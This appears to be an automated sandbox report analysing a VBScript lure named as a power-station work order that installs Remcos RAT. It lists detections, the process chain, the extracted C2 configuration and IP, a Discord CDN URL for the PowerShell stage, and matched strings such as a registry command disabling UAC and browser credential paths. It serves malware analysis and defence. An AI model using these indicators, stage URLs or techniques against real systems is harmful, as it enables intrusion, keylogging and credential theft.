Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WO-663071 Sabiya Power Station Project.vbs

Overview

General Information

Sample name:WO-663071 Sabiya Power Station Project.vbs
Analysis ID:1574063
MD5:29e1bb22ea494b25e915d1b72b50bfc8
SHA1:37b7b92709d22bfe4ae4c18258c3cf6751ae53d2
SHA256:9d5fab129071f6d09f1d45e80991c60459680aab2e6591f8b2cec9909e37a5eb
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7340 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7832 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 2C248753C0D81181227BB95C0BC614CF)
        • aspnet_compiler.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • aspnet_compiler.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • wscript.exe (PID: 7608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 2C248753C0D81181227BB95C0BC614CF)
        • aspnet_compiler.exe (PID: 7916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x13a8:$a1: Remcos restarted by watchdog!
          • 0x1920:$a3: %02i:%02i:%02i:%03i
          00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 34 entries
            SourceRuleDescriptionAuthorStrings
            7.2.x.exe.4d364f8.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              7.2.x.exe.4d364f8.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x69ef8:$a1: Remcos restarted by watchdog!
              • 0x6a470:$a3: %02i:%02i:%02i:%03i
              6.2.x.exe.44058b0.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                6.2.x.exe.44058b0.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  6.2.x.exe.44058b0.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64204:$str_b2: Executing file:
                  • 0x6503c:$str_b3: GetDirectListeningPort
                  • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x64b80:$str_b7: \update.vbs
                  • 0x6422c:$str_b9: Downloaded file:
                  • 0x64218:$str_b10: Downloading file:
                  • 0x642bc:$str_b12: Failed to upload file:
                  • 0x65004:$str_b13: StartForward
                  • 0x65024:$str_b14: StopForward
                  • 0x64ad8:$str_b15: fso.DeleteFile "
                  • 0x64a6c:$str_b16: On Error Resume Next
                  • 0x64b08:$str_b17: fso.DeleteFolder "
                  • 0x642ac:$str_b18: Uploaded file:
                  • 0x6426c:$str_b19: Unable to delete:
                  • 0x64aa0:$str_b20: while fso.FileExists("
                  • 0x64749:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 28 entries

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 162.159.129.233, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7340, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", CommandLine|base64offset|contains: I, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", ProcessId: 7340, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7832, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7900, ProcessName: aspnet_compiler.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.159.129.233, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7340, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRunScript.lnk
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", CommandLine|base64offset|contains: I, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", ProcessId: 7340, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WO-663071 Sabiya Power Station Project.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7340, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 7448, ProcessName: powershell.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7908, TargetFilename: C:\ProgramData\remcos\logs.dat
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-12T21:31:21.997993+010020365941Malware Command and Control Activity Detected192.168.2.449731162.251.122.872404TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-12T21:31:08.856544+010020188561A Network Trojan was detected162.159.129.233443192.168.2.449730TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-12T21:31:24.469001+010028033043Unknown Traffic192.168.2.449733178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: Yara matchFile source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2994921734.000000000239F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1850661302.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_0043293A
                  Source: x.exe, 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a4812cf0-7

                  Exploits

                  barindex
                  Source: Yara matchFile source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406764 _wcslen,CoGetObject,11_2_00406764
                  Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: Binary string: VBZXCF.pdb source: powershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,11_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,11_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406F06

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49731 -> 162.251.122.87:2404
                  Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 162.159.129.233:443 -> 192.168.2.4:49730
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 162.159.129.233 443Jump to behavior
                  Source: Malware configuration extractorIPs: 162.251.122.87
                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 162.251.122.87:2404
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                  Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49733 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&is=675aa03a&hm=3e85baf94837620960229189756d21650fd643b90a2f7188dd60919d17e93238& HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.251.122.87
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004260F7 recv,11_2_004260F7
                  Source: global trafficHTTP traffic detected: GET /attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&is=675aa03a&hm=3e85baf94837620960229189756d21650fd643b90a2f7188dd60919d17e93238& HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                  Source: aspnet_compiler.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: x.exe, 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: aspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:T
                  Source: aspnet_compiler.exe, 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: aspnet_compiler.exe, 0000000A.00000002.2993408280.0000000000870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpfU
                  Source: x.exe, 00000006.00000002.1851023746.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                  Source: powershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856785002.000001ED2CB73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.1856785002.000001ED2B071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79A2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
